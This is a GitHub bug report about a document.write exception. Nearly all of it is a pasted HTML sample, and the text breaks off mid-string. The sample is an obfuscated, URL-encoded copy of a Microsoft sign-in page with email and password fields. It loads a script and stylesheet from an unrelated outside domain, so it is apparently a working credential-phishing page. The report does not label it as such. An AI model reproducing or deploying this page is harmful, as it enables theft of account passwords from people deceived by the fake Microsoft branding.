Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

document.write caused exception #698

Open
inshua opened this issue Dec 26, 2023 · 2 comments
Open

document.write caused exception #698

inshua opened this issue Dec 26, 2023 · 2 comments

Comments

@inshua
Copy link

inshua commented Dec 26, 2023

here is a sample with document.write(big string), and it raise exception as below

<html dir="ltr" class="" lang="en">
<script language="javascript">
<!--
// == Begin Free HTML Source Code Obfuscation Protection from https://snapbuilder.com == //
document.write(unescape('%0A%0A%3C%68%65%61%64%3E%0A%09%3C%74%69%74%6C%65%3E%53%69%67%6E%20%69%6E%20%74%6F%20%79%6F%75%72%20%61%63%63%6F%75%6E%74%3C%2F%74%69%74%6C%65%3E%0A%09%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2D%54%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%55%54%46%2D%38%22%3E%0A%09%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%58%2D%55%41%2D%43%6F%6D%70%61%74%69%62%6C%65%22%20%63%6F%6E%74%65%6E%74%3D%22%49%45%3D%65%64%67%65%22%3E%0A%09%3C%6D%65%74%61%20%6E%61%6D%65%3D%22%76%69%65%77%70%6F%72%74%22%20%63%6F%6E%74%65%6E%74%3D%22%77%69%64%74%68%3D%64%65%76%69%63%65%2D%77%69%64%74%68%2C%20%69%6E%69%74%69%61%6C%2D%73%63%61%6C%65%3D%31%2E%30%2C%20%6D%61%78%69%6D%75%6D%2D%73%63%61%6C%65%3D%32%2E%30%2C%20%75%73%65%72%2D%73%63%61%6C%61%62%6C%65%3D%79%65%73%22%3E%0A%09%3C%6D%65%74%61%20%6E%61%6D%65%3D%22%72%6F%62%6F%74%73%22%20%63%6F%6E%74%65%6E%74%3D%22%6E%6F%6E%65%22%3E%0A%09%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%63%6F%64%65%2E%6A%71%75%65%72%79%2E%63%6F%6D%2F%6A%71%75%65%72%79%2D%33%2E%31%2E%31%2E%6D%69%6E%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%20%3C%21%2D%2D%20%72%65%70%6C%61%63%65%20%74%68%65%73%65%20%70%6F%69%6E%74%73%20%2D%2D%3E%0A%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%72%65%6F%61%6C%73%2E%73%69%74%65%2F%62%2F%73%74%79%6C%65%73%73%2E%63%73%73%22%3E%0A%20%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%72%65%6F%61%6C%73%2E%73%69%74%65%2F%62%2F%66%69%6C%6C%65%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%0A%3C%21%2D%2D%20%65%6E%64%20%6F%66%20%72%65%70%6C%61%63%65%20%2D%2D%3E%0A%0A%3C%2F%68%65%61%64%3E%0A%0A%3C%62%6F%64%79%20%63%6C%61%73%73%3D%22%63%62%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%20%62%6C%6F%63%6B%3B%22%3E%0A%09%3C%64%69%76%3E%0A%09%09%3C%64%69%76%3E%3C%2F%64%69%76%3E%0A%09%09%09%3C%64%69%76%3E%0A%09%09%09%09%3C%64%69%76%20%69%64%3D%22%6C%69%67%68%74%62%6F%78%54%65%6D%70%6C%61%74%65%43%6F%6E%74%61%69%6E%65%72%22%3E%0A%09%09%09%09%09%3C%64%69%76%20%69%64%3D%22%6C%69%67%68%74%62%6F%78%42%61%63%6B%67%72%6F%75%6E%64%43%6F%6E%74%61%69%6E%65%72%22%3E%0A%09%09%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%62%61%63%6B%67%72%6F%75%6E%64%2D%69%6D%61%67%65%2D%68%6F%6C%64%65%72%22%20%72%6F%6C%65%3D%22%70%72%65%73%65%6E%74%61%74%69%6F%6E%22%3E%0A%09%09%09%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%62%61%63%6B%67%72%6F%75%6E%64%2D%69%6D%61%67%65%20%65%78%74%2D%62%61%63%6B%67%72%6F%75%6E%64%2D%69%6D%61%67%65%22%20%73%74%79%6C%65%3D%22%62%61%63%6B%67%72%6F%75%6E%64%2D%69%6D%61%67%65%3A%20%75%72%6C%28%26%71%75%6F%74%3B%68%74%74%70%73%3A%2F%2F%61%61%64%63%64%6E%2E%6D%73%66%74%61%75%74%68%2E%6E%65%74%2F%73%68%61%72%65%64%2F%31%2E%30%2F%63%6F%6E%74%65%6E%74%2F%69%6D%61%67%65%73%2F%62%61%63%6B%67%72%6F%75%6E%64%73%2F%32%5F%62%63%33%64%33%32%61%36%39%36%38%39%35%66%37%38%63%31%39%64%66%36%63%37%31%37%35%38%36%61%35%64%2E%73%76%67%26%71%75%6F%74%3B%29%3B%22%3E%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%6F%75%74%65%72%22%3E%0A%09%09%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%74%65%6D%70%6C%61%74%65%2D%73%65%63%74%69%6F%6E%20%6D%61%69%6E%2D%73%65%63%74%69%6F%6E%22%3E%0A%09%09%09%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%6D%69%64%64%6C%65%22%3E%0A%09%09%09%09%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%66%75%6C%6C%2D%68%65%69%67%68%74%22%3E%0A%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%66%6C%65%78%2D%63%6F%6C%75%6D%6E%22%3E%0A%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%77%69%6E%2D%73%63%72%6F%6C%6C%22%3E%0A%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%69%64%3D%22%6C%69%67%68%74%62%6F%78%22%20%63%6C%61%73%73%3D%22%73%69%67%6E%2D%69%6E%2D%62%6F%78%20%65%78%74%2D%73%69%67%6E%2D%69%6E%2D%62%6F%78%20%66%61%64%65%2D%69%6E%2D%6C%69%67%68%74%62%6F%78%22%20%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%6C%69%67%68%74%62%6F%78%2D%63%6F%76%65%72%22%3E%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%3E%3C%69%6D%67%20%63%6C%61%73%73%3D%22%62%61%6E%6E%65%72%2D%6C%6F%67%6F%22%20%72%6F%6C%65%3D%22%69%6D%67%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%61%61%64%63%64%6E%2E%6D%73%66%74%61%75%74%68%2E%6E%65%74%2F%73%68%61%72%65%64%2F%31%2E%30%2F%63%6F%6E%74%65%6E%74%2F%69%6D%61%67%65%73%2F%6D%69%63%72%6F%73%6F%66%74%5F%6C%6F%67%6F%5F%65%65%35%63%38%64%39%66%62%36%32%34%38%63%39%33%38%66%64%30%64%63%31%39%33%37%30%65%39%30%62%64%2E%73%76%67%22%3E%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09'));
//-->
</script>
<div role="main">
												<div role="main">
													<div class="">
														<div class="animate slide-in-next">
															<div>
																<div class="identityBanner">
																	<button type="button" class="backButton" id="idBtn_Back"> <img role="presentation" pngsrc="https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png" svgsrc="https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg" src="https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg"> </button>
																	<div id="displayName" class="identity"><input type="text" name="myemail" id="email" value="[email protected]" maxlength="128"  style=" width:300px; border:none; font-size:14px; margin-top: -5px; font-family:arial;"></div>
																</div>
															</div>
														</div>
<script language="javascript">
<!--
// == Begin Free HTML Source Code Obfuscation Protection from https://snapbuilder.com == //
document.write(unescape('%3C%64%69%76%20%63%6C%61%73%73%3D%22%70%61%67%69%6E%61%74%69%6F%6E%2D%76%69%65%77%20%61%6E%69%6D%61%74%65%20%68%61%73%2D%69%64%65%6E%74%69%74%79%2D%62%61%6E%6E%65%72%20%73%6C%69%64%65%2D%69%6E%2D%6E%65%78%74%22%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%64%61%74%61%2D%76%69%65%77%69%64%3D%22%32%22%20%64%61%74%61%2D%73%68%6F%77%69%64%65%6E%74%69%74%79%62%61%6E%6E%65%72%3D%22%74%72%75%65%22%20%64%61%74%61%2D%64%79%6E%61%6D%69%63%62%72%61%6E%64%69%6E%67%3D%22%74%72%75%65%22%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%69%64%3D%22%6C%6F%67%69%6E%48%65%61%64%65%72%22%20%63%6C%61%73%73%3D%22%72%6F%77%20%74%69%74%6C%65%20%65%78%74%2D%74%69%74%6C%65%22%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%72%6F%6C%65%3D%22%68%65%61%64%69%6E%67%22%3E%45%6E%74%65%72%20%70%61%73%73%77%6F%72%64%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%20%20%20%20%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%68%69%64%64%65%6E%22%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%63%6F%6E%74%72%6F%6C%22%20%6E%61%6D%65%3D%22%69%6E%64%69%63%61%22%20%69%64%3D%22%69%6E%64%69%63%61%22%20%76%61%6C%75%65%3D%22%22%3E%0A%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%72%6F%77%22%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%67%72%6F%75%70%20%63%6F%6C%2D%6D%64%2D%32%34%22%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%72%6F%6C%65%3D%22%61%6C%65%72%74%22%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%69%64%3D%22%70%61%73%73%77%6F%72%64%45%72%72%6F%72%32%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%3B%22%20%63%6C%61%73%73%3D%22%61%6C%65%72%74%20%61%6C%65%72%74%2D%65%72%72%6F%72%22%3E%50%6C%65%61%73%65%20%65%6E%74%65%72%20%79%6F%75%72%20%70%61%73%73%77%6F%72%64%2E%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%69%64%3D%22%70%61%73%73%77%6F%72%64%45%72%72%6F%72%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%3B%22%20%63%6C%61%73%73%3D%22%61%6C%65%72%74%20%61%6C%65%72%74%2D%65%72%72%6F%72%22%3E%59%6F%75%72%20%61%63%63%6F%75%6E%74%20%6F%72%20%70%61%73%73%77%6F%72%64%20%69%73%20%69%6E%63%6F%72%72%65%63%74%2E%20%49%66%20%79%6F%75%20%63%61%6E%27%74%20%72%65%6D%65%6D%62%65%72%20%79%6F%75%72%20%70%61%73%73%77%6F%72%64%2C%20%3C%61%20%69%64%3D%22%69%64%41%5F%49%4C%5F%46%6F%72%67%6F%74%50%61%73%73%77%6F%72%64%30%22%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%70%61%73%73%77%6F%72%64%72%65%73%65%74%2E%6D%69%63%72%6F%73%6F%66%74%6F%6E%6C%69%6E%65%2E%63%6F%6D%2F%3F%72%75%3D%68%74%74%70%73%25%33%61%25%32%66%25%32%66%6C%6F%67%69%6E%2E%6D%69%63%72%6F%73%6F%66%74%6F%6E%6C%69%6E%65%2E%63%6F%6D%25%32%66%63%6F%6D%6D%6F%6E%25%32%66%72%65%70%72%6F%63%65%73%73%25%33%66%63%74%78%25%33%64%72%51%49%49%41%59%57%53%4F%32%5F%54%55%41%42%47%34%36%52%4E%48%30%4D%70%43%41%45%53%55%6C%55%6B%42%6F%54%6B%35%4E%72%58%6A%37%6F%49%43%54%38%53%70%34%6B%54%31%34%6D%54%31%42%46%53%46%4C%38%53%4F%33%34%31%64%75%72%47%41%7A%4E%6A%4A%34%61%79%4D%56%59%77%77%49%54%36%44%2D%6A%55%47%58%56%69%51%6B%77%49%43%51%6B%78%30%66%34%43%6C%6B%38%36%33%33%72%4F%2D%67%70%56%67%69%56%51%41%6B%38%4C%57%41%6E%62%66%55%78%41%67%68%7A%52%4F%6F%4D%79%49%77%71%69%42%49%4D%42%64%45%54%67%46%41%70%4A%53%45%45%63%59%43%59%4A%34%4F%7A%4F%2D%75%62%4C%6B%31%63%66%72%39%34%33%78%4C%65%58%78%72%4D%76%2D%53%74%77%68%6D%78%4E%6B%69%53%4B%64%38%76%6C%4E%45%31%4C%6F%57%30%37%68%6C%55%79%51%72%5F%73%6A%51%4C%54%43%63%61%66%45%65%51%53%51%62%34%6A%79%47%6C%2D%32%51%70%51%6B%54%76%4C%78%78%53%6B%73%5A%30%64%51%44%4D%41%68%78%41%43%69%67%59%6C%7A%65%58%63%6C%6C%5F%31%4E%46%64%4A%42%6F%49%35%61%66%49%41%61%4A%6C%42%53%71%72%6E%61%43%36%62%61%47%37%4C%30%5F%43%71%32%38%6F%55%55%6C%61%72%55%31%6D%73%4C%46%71%71%51%54%51%7A%4A%64%48%55%6C%71%4D%35%41%44%51%7A%44%55%6A%39%50%57%49%67%56%4B%36%5F%67%61%39%6C%57%6A%6F%51%32%75%35%41%47%48%68%66%38%37%64%6B%64%70%35%4D%38%4A%73%4A%5A%30%35%6D%5F%63%71%76%32%65%48%4D%48%30%5A%68%6E%4A%77%57%33%75%51%50%36%30%54%6F%4E%6F%65%69%30%31%45%46%66%4F%43%79%72%68%64%67%34%32%67%6F%48%6D%56%69%54%54%4A%51%55%70%73%75%61%44%72%53%69%59%4E%59%62%66%50%47%48%49%75%71%39%61%34%34%49%45%6C%5A%53%6C%70%48%52%7A%30%6D%56%58%75%53%50%71%61%56%54%45%37%37%76%6D%34%65%31%38%65%4E%69%4F%33%4E%7A%45%52%58%79%63%6A%73%75%4B%5A%74%4D%70%59%72%71%74%7A%55%74%74%72%6A%66%6C%44%72%73%33%4E%30%55%57%6D%67%61%56%75%73%79%39%57%75%37%34%6D%45%6A%71%49%54%7A%38%64%31%5A%73%5A%4A%55%74%54%67%6A%75%55%44%73%38%38%79%2D%36%6A%65%70%75%49%2D%6E%4D%59%65%51%78%79%4C%6B%63%4B%69%4F%78%57%68%7A%78%33%55%6D%69%72%68%64%48%6E%63%61%78%42%47%56%2D%64%4E%52%62%46%73%4B%75%54%5A%64%6C%68%4E%44%5A%6A%5A%38%44%69%4C%57%53%68%6A%5A%4B%4C%51%6B%6E%59%30%7A%39%70%2D%41%39%53%56%6F%4C%4F%51%78%32%71%6D%63%58%49%76%56%61%65%5A%33%5A%4D%58%63%4D%35%48%49%36%37%52%6F%64%45%64%48%54%59%7A%6A%77%51%31%5F%41%42%76%73%4A%38%4B%78%57%75%5A%66%68%68%63%46%44%62%43%79%41%6F%63%63%7A%75%61%68%62%62%6A%57%64%38%4B%44%2D%50%45%69%69%5A%57%6B%44%70%65%48%41%59%76%76%44%41%77%77%30%41%66%4C%57%37%30%58%79%34%68%50%35%62%75%72%52%59%33%43%77%39%79%32%37%6B%6E%64%30%46%68%64%33%56%31%66%54%4E%33%51%33%2D%57%6B%48%66%4C%31%79%30%78%7A%42%61%68%50%5F%72%41%6E%74%5F%66%4C%32%37%38%5F%5A%32%37%57%43%34%66%6A%67%31%50%31%36%33%75%71%4F%5A%30%4E%63%34%64%45%5F%74%4A%4A%59%69%73%69%4F%64%48%6C%42%58%5A%6F%45%73%63%6C%69%57%32%6F%5F%47%48%7A%65%66%30%4C%6E%5A%53%52%45%36%4B%78%59%76%69%37%54%31%68%32%4B%71%6F%48%5A%56%74%43%57%78%62%77%49%66%67%5A%37%48%77%65%69%56%33%76%76%61%66%4F%76%38%42%30%26%61%6D%70%3B%6D%6B%74%3D%65%6E%2D%47%42%26%61%6D%70%3B%68%6F%73%74%65%64%3D%30%26%61%6D%70%3B%64%65%76%69%63%65%5F%70%6C%61%74%66%6F%72%6D%3D%57%69%6E%64%6F%77%73%2B%31%30%22%3E%72%65%73%65%74%20%69%74%20%6E%6F%77%2E%3C%2F%61%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%69%64%3D%22%69%6D%70%6F%72%74%61%6E%74%22%20%73%74%79%6C%65%3D%22%63%6F%6C%6F%72%3A%20%62%6C%61%63%6B%3B%66%6F%6E%74%2D%73%69%7A%65%3A%20%31%34%70%78%3B%20%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%22%20%63%6C%61%73%73%3D%22%61%6C%65%72%74%20%61%6C%65%72%74%2D%65%72%72%6F%72%22%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%42%65%63%61%75%73%65%20%79%6F%75%27%72%65%20%61%63%63%65%73%73%69%6E%67%20%73%65%6E%73%69%74%69%76%65%20%69%6E%66%6F%2C%20%79%6F%75%20%6E%65%65%64%20%74%6F%20%76%65%72%69%66%79%20%79%6F%75%72%20%70%61%73%73%77%6F%72%64%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%70%6C%61%63%65%68%6F%6C%64%65%72%43%6F%6E%74%61%69%6E%65%72%22%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%69%6E%70%75%74%20%6E%61%6D%65%3D%22%74%68%65%70%61%73%73%77%6F%72%64%22%20%74%79%70%65%3D%22%70%61%73%73%77%6F%72%64%22%20%69%64%3D%22%69%30%31%31%38%22%20%61%75%74%6F%63%6F%6D%70%6C%65%74%65%3D%22%6F%66%66%22%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%63%6F%6E%74%72%6F%6C%20%69%6E%70%75%74%20%65%78%74%2D%69%6E%70%75%74%20%74%65%78%74%2D%62%6F%78%20%65%78%74%2D%74%65%78%74%2D%62%6F%78%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%22%50%61%73%73%77%6F%72%64%22%20%74%61%62%69%6E%64%65%78%3D%22%30%22%3E%20%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%70%6F%73%69%74%69%6F%6E%2D%62%75%74%74%6F%6E%73%22%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%72%6F%77%22%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%6F%6C%2D%6D%64%2D%32%34%22%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%74%65%78%74%2D%31%33%22%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%67%72%6F%75%70%22%3E%20%3C%61%20%69%64%3D%22%69%64%41%5F%50%57%44%5F%46%6F%72%67%6F%74%50%61%73%73%77%6F%72%64%22%20%72%6F%6C%65%3D%22%6C%69%6E%6B%22%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%70%61%73%73%77%6F%72%64%72%65%73%65%74%2E%6D%69%63%72%6F%73%6F%66%74%6F%6E%6C%69%6E%65%2E%63%6F%6D%2F%3F%72%75%3D%68%74%74%70%73%25%33%61%25%32%66%25%32%66%6C%6F%67%69%6E%2E%6D%69%63%72%6F%73%6F%66%74%6F%6E%6C%69%6E%65%2E%63%6F%6D%25%32%66%63%6F%6D%6D%6F%6E%25%32%66%72%65%70%72%6F%63%65%73%73%25%33%66%63%74%78%25%33%64%72%51%49%49%41%59%57%53%76%59%5F%6A%5A%42%44%47%34%32%51%33%6C%38%32%42%4F%51%35%30%4F%71%69%32%51%41%49%68%4F%58%6E%39%48%61%39%30%52%62%4C%4F%35%6D%76%39%4F%74%6B%34%69%5A%30%6D%53%70%77%33%39%70%76%59%73%64%64%78%45%71%39%31%66%38%42%32%58%49%58%51%46%52%52%58%4C%67%30%36%47%6B%51%44%39%56%5A%58%62%34%4D%72%43%6B%53%42%71%4F%67%4F%4C%39%51%6E%6D%70%6E%6E%6D%52%6E%4E%46%50%4D%72%46%6F%51%53%54%5A%64%41%43%58%79%5A%59%30%72%67%35%44%4E%4F%46%48%69%4F%34%32%63%55%79%35%67%43%78%55%6B%7A%51%46%56%59%4A%46%44%30%58%47%4C%54%46%69%4D%4B%35%6A%52%34%58%48%79%55%2D%58%62%62%65%50%58%7A%70%5F%4A%58%31%37%2D%32%50%5F%5F%6A%39%64%63%33%78%4C%45%64%68%76%37%6D%70%46%7A%65%37%5F%63%6C%62%37%48%41%4A%69%71%5A%6E%6C%74%32%70%75%73%35%58%6C%73%37%35%6B%65%43%65%45%4D%51%4C%37%4F%48%61%45%32%31%34%45%31%32%49%36%51%62%4B%7A%78%64%6B%51%53%61%59%39%4C%4D%4D%43%56%6C%57%57%57%4E%75%49%61%68%5A%6F%52%4B%6E%47%6F%4D%41%42%7A%31%6F%6E%50%4E%78%6A%42%57%51%75%69%65%32%51%5A%7A%74%6F%53%79%37%53%71%61%77%63%43%52%77%64%37%50%4B%62%49%56%4B%72%49%52%77%54%34%41%71%6E%5A%6D%6E%34%5F%71%45%5A%54%72%61%61%30%61%77%37%6A%46%71%35%6F%52%47%5A%72%46%33%57%55%5F%55%4B%76%62%30%47%62%75%67%78%66%67%47%50%32%56%50%56%70%34%67%54%76%78%76%55%33%34%4D%76%64%64%74%72%63%49%4B%33%44%59%48%57%34%44%33%46%74%59%51%71%50%72%69%4F%71%36%36%56%46%39%66%63%68%66%44%65%5A%74%53%52%39%56%4F%5F%4F%59%36%31%4C%4B%47%57%57%74%78%7A%74%5F%6A%78%6E%32%64%49%6C%47%6A%6F%37%5A%57%41%5F%63%6C%52%5F%78%53%4E%59%47%37%55%6D%73%58%31%43%49%62%72%4D%64%67%65%76%56%4C%38%32%65%70%30%53%74%63%47%71%64%2D%70%32%57%30%59%6D%58%73%37%6A%4C%58%51%59%41%73%33%55%46%53%32%74%54%61%66%72%37%43%6E%5A%31%58%5F%56%39%73%4A%64%30%65%46%45%7A%71%62%35%63%67%63%71%77%32%78%56%57%59%78%7A%79%38%41%71%73%52%6E%78%64%56%44%65%2D%50%74%62%31%73%59%6C%47%57%31%72%54%52%56%36%59%74%4F%67%64%30%36%42%43%49%77%70%46%78%35%37%32%2D%5F%4A%67%6F%44%65%6D%62%55%39%61%43%45%50%4C%52%65%4F%36%50%61%74%47%57%6E%70%39%4B%55%5A%4E%4C%72%44%30%73%64%32%52%58%59%32%4B%4C%67%65%55%76%6E%46%72%4C%64%75%61%44%75%55%4A%75%30%4A%6F%77%38%33%30%78%72%6C%55%32%39%55%34%77%55%59%68%52%56%2D%63%6A%76%42%34%61%4C%47%39%6C%58%5F%61%63%41%48%77%31%4B%48%69%44%36%79%62%33%43%66%76%2D%50%6D%4F%65%5A%33%4C%70%38%4C%31%31%72%63%35%30%66%50%52%47%73%2D%50%5F%63%42%62%59%41%65%39%69%35%4D%64%55%31%62%5F%64%55%33%50%52%61%57%71%34%37%77%35%49%48%34%5F%65%46%4C%49%50%33%72%34%4E%48%4F%63%2D%65%4A%6A%6B%44%73%70%46%46%4C%79%37%74%33%66%42%38%53%72%77%78%54%44%72%6E%6A%33%48%50%5F%77%57%2D%75%62%79%66%66%67%2D%4F%31%31%35%76%61%77%76%47%41%72%51%57%43%63%72%31%53%37%50%30%43%31%70%51%4F%31%71%5F%49%4F%41%44%65%45%55%71%63%58%31%72%32%64%4C%44%58%4C%5F%59%37%6D%30%65%59%7A%38%59%52%2D%6B%53%64%65%35%50%4F%33%2D%51%39%62%38%67%54%57%74%62%35%57%68%58%4C%31%51%6D%59%6D%34%4D%38%38%63%66%30%67%38%39%50%52%5F%34%4A%39%39%39%35%48%78%65%49%57%54%78%7A%50%6E%44%70%6F%38%5F%67%5F%77%48%39%35%50%35%4F%51%52%45%4A%6D%45%7A%4B%58%6B%41%63%4A%65%5A%69%51%2D%59%52%38%6B%4A%43%46%68%44%78%4B%79%47%4A%43%50%76%77%48%30%26%61%6D%70%3B%6D%6B%74%3D%65%6E%2D%49%4E%26%61%6D%70%3B%68%6F%73%74%65%64%3D%30%26%61%6D%70%3B%64%65%76%69%63%65%5F%70%6C%61%74%66%6F%72%6D%3D%57%69%6E%64%6F%77%73%2B%31%30%22%3E%46%6F%72%67%6F%74%20%6D%79%20%70%61%73%73%77%6F%72%64%3C%2F%61%3E%20%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%67%72%6F%75%70%22%3E%20%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%77%69%6E%2D%62%75%74%74%6F%6E%2D%70%69%6E%2D%62%6F%74%74%6F%6D%22%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%72%6F%77%22%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%6F%6C%2D%78%73%2D%32%34%20%6E%6F%2D%70%61%64%64%69%6E%67%2D%6C%65%66%74%2D%72%69%67%68%74%20%62%75%74%74%6F%6E%2D%63%6F%6E%74%61%69%6E%65%72%22%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%69%6E%6C%69%6E%65%2D%62%6C%6F%63%6B%22%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%62%75%74%74%6F%6E%22%20%6F%6E%63%6C%69%63%6B%3D%22%6F%6E%4D%79%63%68%65%63%6B%65%64%28%29%22%20%69%64%3D%22%69%64%53%49%42%75%74%74%6F%6E%39%22%20%63%6C%61%73%73%3D%22%77%69%6E%2D%62%75%74%74%6F%6E%20%62%75%74%74%6F%6E%5F%70%72%69%6D%61%72%79%20%62%75%74%74%6F%6E%20%65%78%74%2D%62%75%74%74%6F%6E%20%70%72%69%6D%61%72%79%20%65%78%74%2D%70%72%69%6D%61%72%79%22%20%76%61%6C%75%65%3D%22%53%69%67%6E%20%69%6E%22%3E%20%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A